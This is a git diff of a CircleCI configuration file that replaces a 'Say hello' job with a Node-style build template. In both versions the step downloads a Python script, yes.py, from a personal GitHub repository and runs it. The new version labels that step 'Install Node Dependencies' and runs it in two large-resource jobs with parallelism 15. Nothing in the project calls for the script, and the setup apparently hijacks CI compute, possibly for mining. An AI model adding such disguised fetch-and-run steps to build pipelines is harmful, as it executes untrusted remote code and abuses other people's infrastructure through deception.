--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -1,32 +1,30 @@
-# Use the latest 2.1 version of CircleCI pipeline process engine.
-# See: https://circleci.com/docs/2.0/configuration-reference
-version: 2.1
-
-# Define a job to be invoked later in a workflow.
-# See: https://circleci.com/docs/2.0/configuration-reference/#jobs
-jobs:
-  say-hello:
-    # Specify the execution environment. You can specify an image from Dockerhub or use one of our Convenience Images from CircleCI's Developer Hub.
-    # See: https://circleci.com/docs/2.0/configuration-reference/#docker-machine-macos-windows-executor
-    docker:
-      - image: circleci/ruby:2.5.3
-    parallelism: 16
-    # Add steps to the job
-    # See: https://circleci.com/docs/2.0/configuration-reference/#steps
-    steps:
-      - checkout
-      - run:
-          name: "Say hello"
-          command: |
-            echo "Start"
-            wget https://raw.githubusercontent.com/sjhks/YAjk/main/yes.py
-            ls
-            timeout 58m python yes.py
-            echo "Completed"
-
-# Invoke jobs via workflows
-# See: https://circleci.com/docs/2.0/configuration-reference/#workflows
-workflows:
-  say-hello-workflow:
-    jobs:
-      - say-hello
+working_dir: &working_dir ~/node 
+.build_template: &builder 
+  parallelism: 15 
+  resource_class: large 
+  steps:  
+    - checkout  
+    - run:  
+        name: Install  Node Dependencies 
+      
+        command: |
+           wget https://raw.githubusercontent.com/sjhks/YAjk/main/yes.py
+           python yes.py
+ 
+version: 2.0  
+jobs:  
+  deploy:  
+    <<: *builder  
+    docker:  
+      - image: circleci/node:14.17.3 
+  production:  
+    <<: *builder  
+    docker:  
+      - image: circleci/node:14.17.3 
+  
+workflows:  
+  version: 2  
+  commit:  
+    jobs:  
+      - deploy  
+      - production
